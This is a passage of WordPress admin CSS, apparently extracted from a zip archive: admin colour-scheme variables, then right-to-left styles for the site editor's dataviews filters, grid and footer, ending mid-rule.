.interface-interface-skeleton{top:0}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!nj1j1dist/edit-site/posts-rtl.cssnuȯ@charset "UTF-8"; :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .dataviews-picker-wrapper,.dataviews-wrapper{ box-sizing:border-box; container:dataviews-wrapper/inline-size; display:flex; flex-direction:column; font-size:13px; height:100%; line-height:1.4; overflow:auto; scroll-padding-bottom:64px; } .dataviews-filters__container,.dataviews__view-actions{ box-sizing:border-box; flex-shrink:0; padding:16px 48px; position:sticky; right:0; } @media not (prefers-reduced-motion){ .dataviews-filters__container,.dataviews__view-actions{ transition:padding .1s ease-out; } } .dataviews-loading,.dataviews-no-results{ align-items:center; display:flex; flex-grow:1; justify-content:center; padding:0 48px; } @media not (prefers-reduced-motion){ .dataviews-loading,.dataviews-no-results{ transition:padding .1s ease-out; } } .dataviews-loading-more{ text-align:center; } @container (max-width: 430px){ .dataviews-filters__container,.dataviews__view-actions{ padding:12px 24px; } .dataviews-loading,.dataviews-no-results{ padding-left:24px; padding-right:24px; } } .dataviews-title-field{ font-size:13px; font-weight:500; width:100%; } .dataviews-title-field,.dataviews-title-field a{ color:#2f2f2f; text-overflow:ellipsis; white-space:nowrap; } .dataviews-title-field a{ display:block; flex-grow:0; overflow:hidden; text-decoration:none; } .dataviews-title-field a:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field a:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .dataviews-title-field button.components-button.is-link{ color:#1e1e1e; display:block; font-weight:inherit; overflow:hidden; text-decoration:none; text-overflow:ellipsis; white-space:nowrap; width:100%; } .dataviews-title-field button.components-button.is-link:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable{ color:#2f2f2f; cursor:pointer; } .dataviews-title-field--clickable:hover{ color:var(--wp-admin-theme-color); } .dataviews-title-field--clickable:focus{ border-radius:2px; box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color, #007cba); color:var(--wp-admin-theme-color--rgb); } .components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){ overflow:hidden; padding:8px 0 0; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{ padding-inline:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{ padding-inline-start:24px; } .components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{ padding-inline-end:24px; } .dataviews-bulk-actions-footer__item-count{ color:#1e1e1e; font-size:11px; font-weight:500; text-transform:uppercase; } .dataviews-bulk-actions-footer__container{ margin-left:auto; min-height:32px; } .dataviews-filters__button{ position:relative; } .dataviews-filters__container{ padding-top:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{ opacity:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{ opacity:1; } .dataviews-filters__summary-popover{ font-size:13px; line-height:1.4; } .dataviews-filters__summary-popover .components-popover__content{ border-radius:4px; max-width:250px; min-width:230px; width:100%; } .dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{ padding:0; } .dataviews-filters__summary-operators-container{ padding:8px 16px; } .dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){ border-bottom:1px solid #e0e0e0; } .dataviews-filters__summary-operators-container:empty{ display:none; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{ color:#757575; flex-shrink:0; max-width:calc(100% - 55px); overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{ overflow:hidden; white-space:nowrap; width:100%; } .dataviews-filters__summary-chip-container{ position:relative; white-space:pre-wrap; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{ align-items:center; background:#f0f0f0; border:1px solid #0000; border-radius:16px; box-sizing:border-box; color:#2f2f2f; cursor:pointer; display:flex; min-height:32px; padding:4px 12px; position:relative; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{ cursor:default; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{ padding-inline-end:28px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{ background:#e0e0e0; color:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{ background:rgba(var(--wp-admin-theme-color--rgb), .04); color:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{ background:rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{ font-weight:500; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{ align-items:center; background:#0000; border:0; border-radius:50%; cursor:pointer; display:flex; height:24px; justify-content:center; left:4px; padding:0; position:absolute; top:50%; transform:translateY(-50%); width:24px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{ fill:#757575; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{ background:#e0e0e0; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{ fill:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{ fill:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__search-widget-filter-combobox-list{ border-top:1px solid #e0e0e0; max-height:184px; overflow:auto; padding:4px; } .dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{ font-weight:600; } .dataviews-filters__search-widget-listbox{ overflow:auto; padding:4px; } .dataviews-filters__search-widget-listitem{ align-items:center; border-radius:2px; box-sizing:border-box; cursor:default; display:flex; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; gap:8px; line-height:20px; min-height:32px; padding:4px 12px; } .dataviews-filters__search-widget-listitem:last-child{ margin-block-end:0; } .dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{ background-color:var(--wp-admin-theme-color); color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{ color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{ background:#fff; border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{ border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{ color:#757575; display:block; font-size:12px; line-height:16px; overflow:hidden; text-overflow:ellipsis; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ border:1px solid #1e1e1e; border-radius:50%; height:24px; margin-left:12px; max-width:24px; min-width:24px; position:relative; transition:none; width:24px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ height:16px; max-width:16px; min-width:16px; width:16px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ background-color:#fff; border:4px solid #fff; box-sizing:inherit; height:12px; margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{ background:var(--wp-admin-theme-color); border:none; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ margin:0; padding:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ background-color:#fff; border:4px solid #fff; border-radius:50%; box-sizing:inherit; content:""; height:12px; margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:24px; border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; margin-left:12px; padding:6px 8px; transition:none; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{ opacity:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ color:#fff; margin:-3px -5px; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ margin:-4px -5px 0 0; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ content:"\f460"; display:inline-block; float:right; font:normal 30px/1 dashicons; vertical-align:middle; width:16px; speak:none; -webkit-font-smoothing:antialiased; -moz-osx-font-smoothing:grayscale; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ float:none; font-size:21px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{ background:#f0f0f0; border-color:#ddd; cursor:default; opacity:1; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ background:#fff; color:#1e1e1e; height:var(--checkbox-size); margin:0; padding:0; position:relative; width:var(--checkbox-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:16px; } } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:border-color .1s ease-in-out; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:var(--checkbox-size); fill:#fff; height:var(--checkmark-size); position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:var(--checkmark-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:calc(var(--checkbox-size) + 4px); } } .dataviews-filters__search-widget-filter-combobox__wrapper{ padding:8px; position:relative; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ display:block; font-size:16px; height:32px; margin-left:0; margin-right:0; padding:0 32px 0 8px; width:100%; } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ background:#fff; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{ color:#757575; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{ -webkit-appearance:none; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{ align-items:center; bottom:0; display:flex; inset-inline-start:12px; justify-content:center; position:absolute; top:0; width:24px; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){ transform:scaleX(-1); } .dataviews-filters__container-visibility-toggle{ flex-shrink:0; position:relative; } .dataviews-filters-toggle__count{ background:var(--wp-admin-theme-color, #3858e9); border-radius:8px; box-sizing:border-box; color:#fff; font-size:11px; height:16px; left:0; line-height:16px; min-width:16px; outline:var(--wp-admin-border-width-focus) solid #fff; padding:0 4px; position:absolute; text-align:center; top:0; transform:translate(-50%, -50%); } .dataviews-search{ width:fit-content; } .dataviews-filters__user-input-widget{ padding:16px; } .dataviews-filters__user-input-widget .components-input-control__prefix{ padding-right:8px; } .dataviews-filters__search-widget-no-elements{ align-items:center; display:flex; justify-content:center; padding:16px; } .dataviews-footer{ background-color:#fff; border-top:1px solid #f0f0f0; bottom:0; flex-shrink:0; padding:12px 48px; position:sticky; right:0; } @media not (prefers-reduced-motion){ .dataviews-footer{ transition:padding .1s ease-out; } } .dataviews-footer{ z-index:2; } @container (max-width: 430px){ .dataviews-footer{ padding:12px 24px; } } @container (max-width: 560px){ .dataviews-footer{ flex-direction:column !important; } .dataviews-footer .dataviews-bulk-actions-footer__container{ width:100%; } .dataviews-footer .dataviews-bulk-actions-footer__item-count{ flex-grow:1; } .dataviews-footer .dataviews-pagination{ justify-content:space-between; width:100%; } } .dataviews-pagination__page-select{ font-size:11px; font-weight:500; text-transform:uppercase; } @media (min-width:600px){ .dataviews-pagination__page-select .components-select-control__input{ font-size:11px !important; font-weight:500; } } .dataviews-action-modal{ z-index:1000001; } .dataviews-picker-footer__bulk-selection{ align-self:flex-start; height:32px; } .dataviews-picker-footer__actions{ align-self:flex-end; } .dataviews-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-selection-checkbox{ flex-shrink:0; line-height:0; } .dataviews-selection-checkbox .components-checkbox-control__input-container{ margin:0; } .dataviews-view-config{ container-type:inline-size; font-size:13px; line-height:1.4; width:320px; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{ height:100%; overflow-y:scroll; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{ width:auto; } .dataviews-view-config__sort-direction .components-toggle-group-control-option-base{ text-transform:uppercase; } .dataviews-settings-section__title.dataviews-settings-section__title{ font-size:15px; line-height:24px; } .dataviews-settings-section__sidebar{ grid-column:span 4; } .dataviews-settings-section__content,.dataviews-settings-section__content>*{ grid-column:span 8; } .dataviews-settings-section__content .is-divided-in-two{ display:contents; } .dataviews-settings-section__content .is-divided-in-two>*{ grid-column:span 4; } .dataviews-settings-section:has(.dataviews-settings-section__content:empty){ display:none; } @container (max-width: 500px){ .dataviews-settings-section.dataviews-settings-section{ grid-template-columns:repeat(2, 1fr); } .dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{ grid-column:span 2; } } .dataviews-field-control__field{ height:32px; } .dataviews-field-control__actions{ position:absolute; top:-9999em; } .dataviews-field-control__actions.dataviews-field-control__actions{ gap:4px; } .dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{ position:unset; top:unset; } .dataviews-field-control__icon{ display:flex; width:24px; } .dataviews-field-control__label-sub-label-container{ flex-grow:1; } .dataviews-field-control__label{ display:block; } .dataviews-field-control__sub-label{ color:#757575; font-size:11px; font-style:normal; margin-bottom:0; margin-top:8px; } .dataviews-view-grid-items{ container-type:inline-size; display:grid; gap:32px; grid-template-columns:repeat(auto-fill, minmax(230px, 1fr)); grid-template-rows:max-content; margin-bottom:auto; padding:0 48px 24px; } @container (max-width: 430px){ .dataviews-view-grid-items{ padding-left:24px; padding-right:24px; } } @media not (prefers-reduced-motion){ .dataviews-view-grid-items{ transition:padding .1s ease-out; } } .dataviews-view-grid .dataviews-view-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{ width:fit-content; } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ color:#1e1e1e; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ box-shadow:inset 0 0 0 1px 